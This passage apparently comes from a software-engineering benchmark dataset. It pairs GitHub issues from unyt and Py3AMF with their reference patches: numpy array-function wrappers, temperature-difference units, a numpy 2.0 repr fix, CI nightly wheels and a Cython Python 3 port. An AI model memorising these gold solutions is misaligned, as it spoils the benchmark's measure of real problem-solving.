+ return np.nanpercentile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.nanquantile)
def nanquantile(a, *args, **kwargs):
- return np.nanquantile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.nanquantile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.linalg.det)
def linalg_det(a, *args, **kwargs):
- return np.linalg.det._implementation(
- a.view(np.ndarray), *args, **kwargs
- ) * a.units ** (a.shape[0])
+ return np.linalg.det._implementation(np.asarray(a), *args, **kwargs) * a.units ** (
+ a.shape[0]
+ )
@implements(np.linalg.lstsq)
def linalg_lstsq(a, b, *args, **kwargs):
x, residuals, rank, s = np.linalg.lstsq._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
+ np.asarray(a), np.asarray(b), *args, **kwargs
)
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
@@ -610,9 +586,7 @@ def linalg_solve(a, b, *args, **kwargs):
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
return (
- np.linalg.solve._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.linalg.solve._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* bu
/ au
)
@@ -624,7 +598,7 @@ def linalg_tensorsolve(a, b, *args, **kwargs):
bu = getattr(b, "units", NULL_UNIT)
return (
np.linalg.tensorsolve._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
+ np.asarray(a), np.asarray(b), *args, **kwargs
)
* bu
/ au
@@ -634,30 +608,25 @@ def linalg_tensorsolve(a, b, *args, **kwargs):
@implements(np.linalg.eig)
def linalg_eig(a, *args, **kwargs):
ret_units = a.units
- w, v = np.linalg.eig._implementation(a.view(np.ndarray), *args, **kwargs)
+ w, v = np.linalg.eig._implementation(np.asarray(a), *args, **kwargs)
return w * ret_units, v
@implements(np.linalg.eigh)
def linalg_eigh(a, *args, **kwargs):
ret_units = a.units
- w, v = np.linalg.eigh._implementation(a.view(np.ndarray), *args, **kwargs)
+ w, v = np.linalg.eigh._implementation(np.asarray(a), *args, **kwargs)
return w * ret_units, v
@implements(np.linalg.eigvals)
def linalg_eigvals(a, *args, **kwargs):
- return (
- np.linalg.eigvals._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
- )
+ return np.linalg.eigvals._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.linalg.eigvalsh)
def linalg_eigvalsh(a, *args, **kwargs):
- return (
- np.linalg.eigvalsh._implementation(a.view(np.ndarray), *args, **kwargs)
- * a.units
- )
+ return np.linalg.eigvalsh._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.savetxt)
@@ -671,12 +640,12 @@ def savetxt(fname, X, *args, **kwargs):
"(and `unyt.loadtxt`) instead.",
stacklevel=4,
)
- return np.savetxt._implementation(fname, X.view(np.ndarray), *args, **kwargs)
+ return np.savetxt._implementation(fname, np.asarray(X), *args, **kwargs)
@implements(np.apply_over_axes)
def apply_over_axes(func, a, axes):
- res = func(a.view(np.ndarray), axes[0]) * a.units
+ res = func(np.asarray(a), axes[0]) * a.units
if len(axes) > 1:
# this function is recursive by nature,
# here we intentionally do not call the base _implementation
@@ -696,7 +665,7 @@ def diff_helper(func, arr, *args, **kwargs):
ret_units = delta_degC
else:
ret_units = u
- return func._implementation(arr.view(np.ndarray), *args, **kwargs) * ret_units
+ return func._implementation(np.asarray(arr), *args, **kwargs) * ret_units
@implements(np.diff)
@@ -725,7 +694,7 @@ def cumprod(a, *args, **kwargs):
@implements(np.pad)
def pad(array, *args, **kwargs):
- return np.pad._implementation(array.view(np.ndarray), *args, **kwargs) * array.units
+ return np.pad._implementation(np.asarray(array), *args, **kwargs) * array.units
@implements(np.choose)
@@ -748,7 +717,7 @@ def choose(a, choices, out=None, *args, **kwargs):
a,
[np.asarray(c) for c in choices],
*args,
- out=out.view(np.ndarray),
+ out=np.asarray(out),
**kwargs,
)
if getattr(out, "units", None) is not None:
@@ -759,7 +728,7 @@ def choose(a, choices, out=None, *args, **kwargs):
@implements(np.fill_diagonal)
def fill_diagonal(a, val, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, val)
- np.fill_diagonal._implementation(a.view(np.ndarray), val, *args, **kwargs)
+ np.fill_diagonal._implementation(np.asarray(a), val, *args, **kwargs)
@implements(np.insert)
@@ -767,7 +736,7 @@ def insert(arr, obj, values, *args, **kwargs):
_validate_units_consistency_v2(arr.units, values)
return (
np.insert._implementation(
- arr.view(np.ndarray), obj, np.asarray(values), *args, **kwargs
+ np.asarray(arr), obj, np.asarray(values), *args, **kwargs
)
* arr.units
)
@@ -784,38 +753,34 @@ def isin(element, test_elements, *args, **kwargs):
@implements(np.place)
def place(arr, mask, vals, *args, **kwargs) -> None:
_validate_units_consistency_v2(arr.units, vals)
- np.place._implementation(
- arr.view(np.ndarray), mask, vals.view(np.ndarray), *args, **kwargs
- )
+ np.place._implementation(np.asarray(arr), mask, np.asarray(vals), *args, **kwargs)
@implements(np.put)
def put(a, ind, v, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, v)
- np.put._implementation(a.view(np.ndarray), ind, v.view(np.ndarray))
+ np.put._implementation(np.asarray(a), ind, np.asarray(v))
@implements(np.put_along_axis)
def put_along_axis(arr, indices, values, axis, *args, **kwargs) -> None:
_validate_units_consistency_v2(arr.units, values)
np.put_along_axis._implementation(
- arr.view(np.ndarray), indices, np.asarray(values), axis, *args, **kwargs
+ np.asarray(arr), indices, np.asarray(values), axis, *args, **kwargs
)
@implements(np.putmask)
def putmask(a, mask, values, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, values)
- np.putmask._implementation(
- a.view(np.ndarray), mask, np.asarray(values), *args, **kwargs
- )
+ np.putmask._implementation(np.asarray(a), mask, np.asarray(values), *args, **kwargs)
@implements(np.searchsorted)
def searchsorted(a, v, *args, **kwargs):
_validate_units_consistency_v2(a.units, v)
return np.searchsorted._implementation(
- a.view(np.ndarray), np.asarray(v), *args, **kwargs
+ np.asarray(a), np.asarray(v), *args, **kwargs
)
@@ -844,7 +809,7 @@ def setdiff1d(ar1, ar2, *args, **kwargs):
def sinc(x, *args, **kwargs):
# this implementation becomes necessary after implementing where
# we *want* this one to ignore units
- return np.sinc._implementation(x.view(np.ndarray), *args, **kwargs)
+ return np.sinc._implementation(np.asarray(x), *args, **kwargs)
@implements(np.clip)
@@ -864,7 +829,7 @@ def clip(a, a_min, a_max, out=None, *args, **kwargs):
np.asarray(a_min),
np.asarray(a_max),
*args,
- out=out.view(np.ndarray),
+ out=np.asarray(out),
**kwargs,
)
* a.units
@@ -877,7 +842,7 @@ def clip(a, a_min, a_max, out=None, *args, **kwargs):
@implements(np.where)
def where(condition, *args, **kwargs):
if len(args) == 0:
- return np.where._implementation(condition.view(np.ndarray), **kwargs)
+ return np.where._implementation(np.asarray(condition), **kwargs)
elif len(args) < 2:
# error message borrowed from numpy 1.24.1
@@ -909,7 +874,7 @@ def einsum(subscripts, *operands, out=None, **kwargs):
ret_units = _validate_units_consistency(operands)
if out is not None:
- out_view = out.view(np.ndarray)
+ out_view = np.asarray(out)
else:
out_view = out
@@ -930,9 +895,7 @@ def einsum(subscripts, *operands, out=None, **kwargs):
def convolve(a, v, *args, **kwargs):
ret_units = np.prod(get_units((a, v)))
return (
- np.convolve._implementation(
- a.view(np.ndarray), v.view(np.ndarray), *args, **kwargs
- )
+ np.convolve._implementation(np.asarray(a), np.asarray(v), *args, **kwargs)
* ret_units
)
@@ -941,9 +904,7 @@ def convolve(a, v, *args, **kwargs):
def correlate(a, v, *args, **kwargs):
ret_units = np.prod(get_units((a, v)))
return (
- np.correlate._implementation(
- a.view(np.ndarray), v.view(np.ndarray), *args, **kwargs
- )
+ np.correlate._implementation(np.asarray(a), np.asarray(v), *args, **kwargs)
* ret_units
)
@@ -952,9 +913,7 @@ def correlate(a, v, *args, **kwargs):
def tensordot(a, b, *args, **kwargs):
ret_units = np.prod(get_units((a, b)))
return (
- np.tensordot._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.tensordot._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* ret_units
)
@@ -962,7 +921,7 @@ def tensordot(a, b, *args, **kwargs):
@implements(np.unwrap)
def unwrap(p, *args, **kwargs):
ret_units = p.units
- return np.unwrap._implementation(p.view(np.ndarray), *args, **kwargs) * ret_units
+ return np.unwrap._implementation(np.asarray(p), *args, **kwargs) * ret_units
@implements(np.interp)
@@ -982,7 +941,7 @@ def interp(x, xp, fp, *args, **kwargs):
@implements(np.array_repr)
def array_repr(arr, *args, **kwargs):
- rep = np.array_repr._implementation(arr.view(np.ndarray), *args, **kwargs)
+ rep = np.array_repr._implementation(np.asarray(arr), *args, **kwargs)
rep = rep.replace("array", arr.__class__.__name__)
units_repr = arr.units.__repr__()
if "=" in rep:
@@ -996,7 +955,7 @@ def array_repr(arr, *args, **kwargs):
@implements(np.asfarray)
def asfarray(a, dtype=np.double):
ret_units = a.units
- return np.asfarray._implementation(a.view(np.ndarray), dtype=dtype) * ret_units
+ return np.asfarray._implementation(np.asarray(a), dtype=dtype) * ret_units
# functions with pending deprecations
@@ -1010,12 +969,11 @@ def trapz(y, x=None, dx=1.0, *args, **kwargs):
else:
ret_units = ret_units * getattr(x, "units", NULL_UNIT)
if isinstance(x, np.ndarray):
- x = x.view(np.ndarray)
+ x = np.asarray(x)
if isinstance(dx, np.ndarray):
- dx = dx.view(np.ndarray)
+ dx = np.asarray(dx)
return (
- np.trapz._implementation(y.view(np.ndarray), x, dx, *args, **kwargs)
- * ret_units
+ np.trapz._implementation(np.asarray(y), x, dx, *args, **kwargs) * ret_units
)
| BUG: (NEP 18) spurious errors when mixing array-like with unyt_array with non-default registry
* unyt version: 3.0.0
* Python version: 3.9.17
* Operating System: any
### Description
array functions (NEP 18) are supposed to treat pure numpy arrays as dimensionless, but the way this treatment is implemented in unyt 3.0.0 isn't robust enough and it chokes when passed Python lists, or unyt_arrays that use a registry other than the default one.
### What I Did
The following 3 examples should be produce similar results and certainly not raise errors
```python
import numpy as np
from unyt.unit_object import Unit
from unyt.unit_registry import UnitRegistry
# this is ok
np.concatenate([np.array([1]), [2]*Unit()])
# but this isn't
np.concatenate([[1], [2]*Unit()])
# and neither is this
np.concatenate([np.array([1]), [2]*Unit(registry=UnitRegistry())])
```
| There are really two bugs in here, and I'll try to address them separately | 2023-11-02T09:14:39 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-434 | b0ff846eface70ef987a9f860ce089c2cdea29f9 | diff --git a/docs/usage.rst b/docs/usage.rst
index b7cb53c8..aabb3e72 100644
--- a/docs/usage.rst
+++ b/docs/usage.rst
@@ -959,14 +959,14 @@ bit floating point array.
>>> data = np.array([1, 2, 3], dtype='int32')*km
>>> data.in_units('mile')
- unyt_array([0.62137121, 1.24274242, 1.86411357], dtype=float32, units='mile')
+ unyt_array([0.6213712, 1.2427424, 1.8641136], dtype=float32, units='mile')
In-place operations will also mutate the dtype from float to integer in these
cases, again in a way that will preserve the byte size of the data.
>>> data.convert_to_units('mile')
>>> data
- unyt_array([0.62137121, 1.24274242, 1.86411357], dtype=float32, units='mile')
+ unyt_array([0.6213712, 1.2427424, 1.8641136], dtype=float32, units='mile')
It is possible that arrays containing large integers (16777217 for 32 bit and
9007199254740993 for 64 bit) will lose precision when converting data to a
diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 57a22e62..ccb87bf1 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -995,3 +995,14 @@ def interp(x, xp, fp, *args, **kwargs):
np.interp(np.asarray(x), np.asarray(xp), np.asarray(fp), *args, **kwargs)
* ret_units
)
+
+
+@implements(np.array_repr)
+def array_repr(arr, *args, **kwargs):
+ rep = np.array_repr._implementation(arr.view(np.ndarray), *args, **kwargs)
+ rep = rep.replace("array", arr.__class__.__name__)
+ units_repr = arr.units.__repr__()
+ if "=" in rep:
+ return rep[:-1] + ", units='" + units_repr + "')"
+ else:
+ return rep[:-1] + ", '" + units_repr + "')"
diff --git a/unyt/array.py b/unyt/array.py
index ef06fb41..367ed145 100644
--- a/unyt/array.py
+++ b/unyt/array.py
@@ -636,12 +636,7 @@ def __new__(
return obj
def __repr__(self):
- rep = super().__repr__()
- units_repr = self.units.__repr__()
- if "=" in rep:
- return rep[:-1] + ", units='" + units_repr + "')"
- else:
- return rep[:-1] + ", '" + units_repr + "')"
+ return np.array_repr(self)
def __str__(self):
return str(self.view(np.ndarray)) + " " + str(self.units)
| BUG: future incompatibility with numpy 2.0
Some repr test is broken against numpy 2.0 (dev), see https://github.com/yt-project/unyt/actions/runs/5745024731
| 2023-08-03T09:33:15 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-430 | 80653c20f7f3d72660b683f46fb1670c5fa17d87 | diff --git a/.github/workflows/bleeding-edge.yaml b/.github/workflows/bleeding-edge.yaml
index 54cf0bec..83dec0a9 100644
--- a/.github/workflows/bleeding-edge.yaml
+++ b/.github/workflows/bleeding-edge.yaml
@@ -39,15 +39,15 @@ jobs:
- name: Install dependencies
run: |
- python3 -m pip install --upgrade pip
- python3 -m pip install --upgrade setuptools wheel setuptools_scm
- python3 -m pip install git+https://github.com/numpy/numpy.git
- python3 -m pip install git+https://github.com/matplotlib/matplotlib.git
- python3 -m pip install pytest
- python3 -m pip install --pre sympy
+ python -m pip install --upgrade pip
+ python -m pip install --upgrade setuptools wheel setuptools_scm
+ python -m pip install --pre --extra-index \
+ https://pypi.anaconda.org/scientific-python-nightly-wheels/simple numpy matplotlib
+ python -m pip install pytest
+ python -m pip install --pre sympy
- name: Build unyt
- run: python3 -m pip install --no-build-isolation .
+ run: python -m pip install --no-build-isolation .
- name: Run Tests
run: pytest -vvv unyt/
| 3 new wrappable functions (NEP 18)
### Description
bleeding-edge CI is currently failing because numpy has 3 new wrappable functions
- `np.byte_bounts`
- `np.who`
- `np.safe_eval` (unreleased ?)
The first two are probably good left unwrapped, but `np.safe_eval` isn't documented yet (probably new in numpy dev). I'll dig further in later.
| actually I see now that all three functions were recently marked as deprecated in numpy dev. I assume they are now detected as wrappable as a side effect of this change. The immediate fix is just to ignore them, but long term it would be better to automatically filter out deprecated functions assuming it's possible. | 2023-06-21T08:49:46 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-413 | 6acbb4bd3291095d8568282bf29f6f6aab1e84e8 | diff --git a/tox.ini b/tox.ini
index 8d428416..f220e14b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -21,7 +21,7 @@ deps =
pint
astropy
coverage[toml]>=5.0
- packaging>=20.9,
+ packaging>=20.9
pytest-cov
pytest-doctestplus
matplotlib!=3.5.0
diff --git a/unyt/array.py b/unyt/array.py
index 517dae0e..ef06fb41 100644
--- a/unyt/array.py
+++ b/unyt/array.py
@@ -127,6 +127,7 @@
_sanitize_unit_system,
default_unit_registry,
)
+from unyt.unit_symbols import delta_degC, delta_degF
from ._deprecation import warn_deprecated
@@ -194,6 +195,42 @@ def _preserve_units(unit1, unit2=None):
return 1, unit1
+@lru_cache(maxsize=128, typed=False)
+def _difference_units(unit1, unit2=None):
+ if unit1.dimensions is not temperature:
+ return _preserve_units(unit1, unit2)
+
+ s1 = repr(unit1)
+ if unit2 is not None and unit2 != unit1:
+ s2 = repr(unit2)
+ if s1 in s2 and s2.startswith("delta_"):
+ return 1, unit1
+ elif s2 in s1 and s1.startswith("delta_"):
+ return 1, unit2
+ else:
+ raise InvalidUnitOperation(
+ "Quantities with units of Fahrenheit or Celsius "
+ "cannot be multiplied, divided, subtracted or "
+ "added with data that has different units."
+ )
+
+ if unit1.base_offset == 0.0:
+ return 1, unit1
+
+ if s1 == "degF":
+ return 1, delta_degF
+ elif s1 == "degC":
+ return 1, delta_degC
+ else:
+ # This is supposed to be unreachable
+ raise RuntimeError(
+ "Could not determine difference temperature units "
+ f"in operation ({unit1} - {unit2}).\n"
+ "If you see this error please file an issue at "
+ "https://github.com/yt-project/unyt/issues/new"
+ )
+
+
@lru_cache(maxsize=128, typed=False)
def _power_unit(unit, power):
return 1, unit**power
@@ -444,7 +481,7 @@ class unyt_array(np.ndarray):
_ufunc_registry = {
add: _preserve_units,
- subtract: _preserve_units,
+ subtract: _difference_units,
multiply: _multiply_units,
divide: _divide_units,
logaddexp: _return_without_unit,
@@ -1834,7 +1871,12 @@ def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
):
raise UnitOperationError(ufunc, u0, u1)
- if unit_operator in (_preserve_units, _comparison_unit, _arctan2_unit):
+ if unit_operator in (
+ _preserve_units,
+ _comparison_unit,
+ _arctan2_unit,
+ _difference_units,
+ ):
# check "is" equality first for speed
if u0 is not u1 and u0 != u1:
# we allow adding, multiplying, comparisons with
| Subtracting temperatures gives degC rather than delta_degC
* unyt version:
'v2.8.0'
* Python version:
3.8.12
* Operating System:
Mac
### Description
Working with change in temperature. I would expect a difference between two temperatures to return a delta_degC rather than a degC.
### What I Did
Actual
```
>>> import unyt as u
>>> delta = 2 * u.degC - 1 * u.degC
>>> delta
unyt_quantity(1, 'degC')
>>> delta.to('K')
unyt_quantity(274.15, 'K')
```
Expected
```
>>> import unyt as u
>>> delta = 2 * u.degC - 1 * u.degC
>>> delta
unyt_quantity(1, 'delta_degC')
>>> delta.to('K')
unyt_quantity(1, 'K')
```
| I agree that this feature is desirable. I'll think about how this could be implemented.
There is a workaround:
```python
In [1]: from unyt import degC, delta_degC
In [2]: dt = 20*degC - 10*degC
In [3]: dt
Out[3]: unyt_quantity(10, 'degC')
In [4]: dt.units = delta_degC
In [5]: dt
Out[5]: unyt_quantity(10, 'delta_degC')
```
Other technical computing systems such as Mathcad Prime and Matlab also have this trouble with temperature subtraction:

Sorry for not following up on this as I said I would.
I'm inclined to see this as a bug actually, though it might (or might not) be tricky to fix.
Furthermore I note that on the main branch (future unyt 3.0), `np.diff` behaves as we expect here
```python
>>> from unyt import K
>>> import numpy as np
>>> np.diff([1, 2, 3]*K)
unyt_array([1, 1], 'delta_degC')
```
But manual differences don't
```python
>>> 2*K - 1*K
unyt_quantity(1, 'K')
``` | 2023-04-10T22:08:21 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-412 | be4791b130988b7e433470e6c30b46266096d014 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index b40642b6..57a22e62 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -8,7 +8,6 @@
from unyt.dimensions import temperature
from unyt.exceptions import (
InvalidUnitOperation,
- UnitConversionError,
UnitInconsistencyError,
UnytError,
)
@@ -469,10 +468,7 @@ def _array_comp_helper(a, b):
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
if bu != au and au != NULL_UNIT and bu != NULL_UNIT:
- if (bu / au).is_dimensionless:
- b = np.array(b) * (1 * bu).to(au)
- else:
- raise UnitConversionError(au, au.dimensions, bu, bu.dimensions)
+ b = b.in_units(au)
elif bu == NULL_UNIT:
b = np.array(b) * au
elif au == NULL_UNIT:
| BUG: temperature units comparison
* unyt version: 2.9.5
### Description
I would not expect Kelvin and degree Celsius to compare equal, yet this is the current result of `Unit.__eq__`
### What I Did
```python
import unyt as un
assert un.K != un.degC
```
raises `AssertionError`
Note that on the main branch (unyt 3.0, using NEP 18), this is breaking array comparison
```python
import numpy as np
import unyt as un
assert all(np.isclose([1, 2, 3] * un.K, [-272.15, -271.15, -270.15] * un.degC))
```
I think the correct solution is to include `Unit.base_offset` in the comparison routine, but I'm not 100% certain.
| FTR #408 is only _part_ of the solution to this issue.
Another problem with `np.isclose` and temperature units is that the following line will raise an error for units that have a `base_offset`
https://github.com/yt-project/unyt/blob/79ef518e4cb881352ab4395eec0ea69be94b08df/unyt/_array_functions.py#L472
this is probably simple enough to fix, though to avoid building a chain of co-dependent PRs, I'll wait for #410 and #408 to be resolved. | 2023-04-10T20:53:52 | 0.0 | [] | [] |
||
StdCarrot/Py3AMF | StdCarrot__Py3AMF-12 | 2647369fca00d78305fd70b6fa055b616ba3346d | diff --git a/MANIFEST.in b/MANIFEST.in
index e7fac46c..1de8b8e6 100644
--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -7,3 +7,5 @@ include *.txt
include *.md
global-exclude *.swf
global-exclude *.pyc
+include cpyamf/*.pyx
+include cpyamf/*.pxd
\ No newline at end of file
diff --git a/cpyamf/amf0.pyx b/cpyamf/amf0.pyx
index 2dac848b..b0ca1dde 100644
--- a/cpyamf/amf0.pyx
+++ b/cpyamf/amf0.pyx
@@ -6,7 +6,6 @@ C-extension for L{pyamf.amf3} Python module in L{PyAMF<pyamf>}.
:since: 0.6
"""
-
from cpython cimport *
from libc.stdlib cimport *
from libc.string cimport *
@@ -20,24 +19,24 @@ import pyamf
from pyamf import xml, util
-cdef char TYPE_NUMBER = '\x00'
-cdef char TYPE_BOOL = '\x01'
-cdef char TYPE_STRING = '\x02'
-cdef char TYPE_OBJECT = '\x03'
-cdef char TYPE_MOVIECLIP = '\x04'
-cdef char TYPE_NULL = '\x05'
-cdef char TYPE_UNDEFINED = '\x06'
-cdef char TYPE_REFERENCE = '\x07'
-cdef char TYPE_MIXEDARRAY = '\x08'
-cdef char TYPE_OBJECTTERM = '\x09'
-cdef char TYPE_ARRAY = '\x0A'
-cdef char TYPE_DATE = '\x0B'
-cdef char TYPE_LONGSTRING = '\x0C'
-cdef char TYPE_UNSUPPORTED = '\x0D'
-cdef char TYPE_RECORDSET = '\x0E'
-cdef char TYPE_XML = '\x0F'
-cdef char TYPE_TYPEDOBJECT = '\x10'
-cdef char TYPE_AMF3 = '\x11'
+cdef char TYPE_NUMBER = b'\x00'
+cdef char TYPE_BOOL = b'\x01'
+cdef char TYPE_STRING = b'\x02'
+cdef char TYPE_OBJECT = b'\x03'
+cdef char TYPE_MOVIECLIP = b'\x04'
+cdef char TYPE_NULL = b'\x05'
+cdef char TYPE_UNDEFINED = b'\x06'
+cdef char TYPE_REFERENCE = b'\x07'
+cdef char TYPE_MIXEDARRAY = b'\x08'
+cdef char TYPE_OBJECTTERM = b'\x09'
+cdef char TYPE_ARRAY = b'\x0A'
+cdef char TYPE_DATE = b'\x0B'
+cdef char TYPE_LONGSTRING = b'\x0C'
+cdef char TYPE_UNSUPPORTED = b'\x0D'
+cdef char TYPE_RECORDSET = b'\x0E'
+cdef char TYPE_XML = b'\x0F'
+cdef char TYPE_TYPEDOBJECT = b'\x10'
+cdef char TYPE_AMF3 = b'\x11'
cdef object ASObject = pyamf.ASObject
@@ -122,7 +121,7 @@ cdef class Decoder(codec.Decoder):
break
- key = self.readBytes()
+ key = self.readString()
PyDict_SetItem(obj_attrs, key, self.readElement())
@@ -181,7 +180,7 @@ cdef class Decoder(codec.Decoder):
self.readObjectAttributes(attrs)
- for key, value in attrs.iteritems():
+ for key, value in attrs.items():
try:
key = int(key)
except ValueError:
@@ -229,7 +228,7 @@ cdef class Decoder(codec.Decoder):
l = self.stream.read_ulong()
self.stream.read(&b, l)
- s = PyString_FromStringAndSize(b, <Py_ssize_t>l)
+ s = PyBytes_FromStringAndSize(b, <Py_ssize_t>l)
if bytes:
return s
@@ -329,9 +328,9 @@ cdef class Encoder(codec.Encoder):
self.writeType(TYPE_BOOL)
if b is True:
- return self.writeType('\x01')
+ return self.writeType(b'\x01')
else:
- return self.writeType('\x00')
+ return self.writeType(b'\x00')
cdef int writeUndefined(self, data) except -1:
return self.writeType(TYPE_UNDEFINED)
@@ -387,6 +386,28 @@ cdef class Encoder(codec.Encoder):
return 0
+ cdef int writeSet(self, object a) except -1:
+ cdef Py_ssize_t size = -1, i = -1
+
+ if self.writeReference(a) != -1:
+ return 0
+
+ self.context.addObject(a)
+
+ self.writeType(TYPE_ARRAY)
+ size = PySet_GET_SIZE(a)
+
+ self.stream.write_ulong(size)
+
+ set_iter = iter(a)
+ while True:
+ try:
+ self.writeElement(next(set_iter))
+ except StopIteration:
+ break
+
+ return 0
+
cdef int writeInt(self, object a) except -1:
self.writeType(TYPE_NUMBER)
@@ -406,7 +427,7 @@ cdef class Encoder(codec.Encoder):
"""
Write a string of bytes to the data stream.
"""
- cdef Py_ssize_t l = PyString_GET_SIZE(s)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(s)
if l > 0xffff:
self.writeType(TYPE_LONGSTRING)
@@ -418,7 +439,7 @@ cdef class Encoder(codec.Encoder):
else:
self.stream.write_ushort(l)
- return self.stream.write(PyString_AS_STRING(s), l)
+ return self.stream.write(PyBytes_AS_STRING(s), l)
cdef int writeString(self, u) except -1:
"""
@@ -435,14 +456,14 @@ cdef class Encoder(codec.Encoder):
if PyUnicode_CheckExact(u):
u = self.context.getBytesForString(u)
- cdef Py_ssize_t l = PyString_GET_SIZE(u)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(u)
if l > 0xffff:
self.stream.write_ulong(l)
else:
self.stream.write_ushort(l)
- return self.stream.write(PyString_AS_STRING(u), l)
+ return self.stream.write(PyBytes_AS_STRING(u), l)
cdef int writeXML(self, e) except -1:
"""
@@ -455,14 +476,14 @@ cdef class Encoder(codec.Encoder):
if isinstance(data, unicode):
data = data.encode('utf-8')
- if not PyString_CheckExact(data):
+ if not PyBytes_CheckExact(data):
raise TypeError('expected str from xml.tostring')
- cdef Py_ssize_t l = PyString_GET_SIZE(data)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(data)
self.stream.write_ulong(l)
- return self.stream.write(PyString_AS_STRING(data), l)
+ return self.stream.write(PyBytes_AS_STRING(data), l)
cdef int writeDateTime(self, d) except -1:
if self.timezone_offset is not None:
@@ -491,9 +512,9 @@ cdef class Encoder(codec.Encoder):
@param o: The C{dict} data to be encoded to the AMF0 data stream.
"""
- for key, value in attrs.iteritems():
- if PyInt_Check(key) or PyLong_Check(key):
- key = str(key)
+ for key, value in attrs.items():
+ if PyLong_Check(key):
+ key = str(key).encode()
self.serialiseString(key)
self.writeElement(value)
diff --git a/cpyamf/amf3.pyx b/cpyamf/amf3.pyx
index 8b5c29d6..c8d8ec6e 100644
--- a/cpyamf/amf3.pyx
+++ b/cpyamf/amf3.pyx
@@ -25,22 +25,22 @@ except ImportError:
zlib = None
-cdef char TYPE_UNDEFINED = '\x00'
-cdef char TYPE_NULL = '\x01'
-cdef char TYPE_BOOL_FALSE = '\x02'
-cdef char TYPE_BOOL_TRUE = '\x03'
-cdef char TYPE_INTEGER = '\x04'
-cdef char TYPE_NUMBER = '\x05'
-cdef char TYPE_STRING = '\x06'
-cdef char TYPE_XML = '\x07'
-cdef char TYPE_DATE = '\x08'
-cdef char TYPE_ARRAY = '\x09'
-cdef char TYPE_OBJECT = '\x0A'
-cdef char TYPE_XMLSTRING = '\x0B'
-cdef char TYPE_BYTEARRAY = '\x0C'
+cdef char TYPE_UNDEFINED = b'\x00'
+cdef char TYPE_NULL = b'\x01'
+cdef char TYPE_BOOL_FALSE = b'\x02'
+cdef char TYPE_BOOL_TRUE = b'\x03'
+cdef char TYPE_INTEGER = b'\x04'
+cdef char TYPE_NUMBER = b'\x05'
+cdef char TYPE_STRING = b'\x06'
+cdef char TYPE_XML = b'\x07'
+cdef char TYPE_DATE = b'\x08'
+cdef char TYPE_ARRAY = b'\x09'
+cdef char TYPE_OBJECT = b'\x0A'
+cdef char TYPE_XMLSTRING = b'\x0B'
+cdef char TYPE_BYTEARRAY = b'\x0C'
cdef unsigned int REFERENCE_BIT = 0x01
-cdef char REF_CHAR = '\x01'
+cdef char REF_CHAR = b'\x01'
#: The maximum that can be represented by an signed 29 bit integer.
cdef long MAX_29B_INT = 0x0FFFFFFF
@@ -56,8 +56,8 @@ cdef int OBJECT_ENCODING_PROXY = 0x03
cdef object ByteArrayType = amf3.ByteArray
cdef object DataInput = amf3.DataInput
cdef object DataOutput = amf3.DataOutput
-cdef str empty_string = str('')
-cdef unicode empty_unicode = empty_string.decode('utf-8')
+cdef bytes empty_bytes = b''
+cdef unicode empty_unicode = u''
cdef object undefined = pyamf.Undefined
@@ -435,7 +435,7 @@ cdef class Decoder(codec.Decoder):
break
- attr = self.readBytes()
+ attr = self.readString()
PyDict_SetItem(obj, attr, self.readElement())
@@ -508,7 +508,7 @@ cdef class Decoder(codec.Decoder):
cdef object s
self.stream.read(&buf, ref)
- s = PyString_FromStringAndSize(buf, ref)
+ s = PyBytes_FromStringAndSize(buf, ref)
x = xml.fromstring(
s,
@@ -540,10 +540,10 @@ cdef class Decoder(codec.Decoder):
ref >>= 1
self.stream.read(&buf, ref)
- s = PyString_FromStringAndSize(buf, ref)
+ s = PyBytes_FromStringAndSize(buf, ref)
if zlib:
- if ref > 2 and buf[0] == '\x78' and buf[1] == '\x9c':
+ if ref > 2 and buf[0] == b'\x78' and buf[1] == b'\x9c':
try:
s = zlib.decompress(s)
except zlib.error:
@@ -635,8 +635,8 @@ cdef class Encoder(codec.Encoder):
if PyUnicode_Check(u):
l = PyUnicode_GET_SIZE(u)
is_unicode = 1
- elif PyString_Check(u):
- l = PyString_GET_SIZE(u)
+ elif PyBytes_Check(u):
+ l = PyBytes_GET_SIZE(u)
else:
raise TypeError('Expected str or unicode')
@@ -654,11 +654,11 @@ cdef class Encoder(codec.Encoder):
if is_unicode:
u = self.context.getBytesForString(u)
- l = PyString_GET_SIZE(u)
+ l = PyBytes_GET_SIZE(u)
_encode_integer(self.stream, (l << 1) | REFERENCE_BIT)
- return self.stream.write(PyString_AS_STRING(u), l)
+ return self.stream.write(PyBytes_AS_STRING(u), l)
cdef int writeString(self, object s) except -1:
self.writeType(TYPE_STRING)
